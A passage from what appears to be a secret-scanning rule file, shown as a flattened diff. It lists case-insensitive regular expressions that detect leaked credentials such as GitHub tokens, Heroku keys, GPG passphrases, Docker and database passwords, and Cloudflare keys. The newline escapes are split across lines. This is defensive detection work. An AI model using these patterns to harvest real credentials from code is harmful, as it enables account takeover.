]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumerkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - 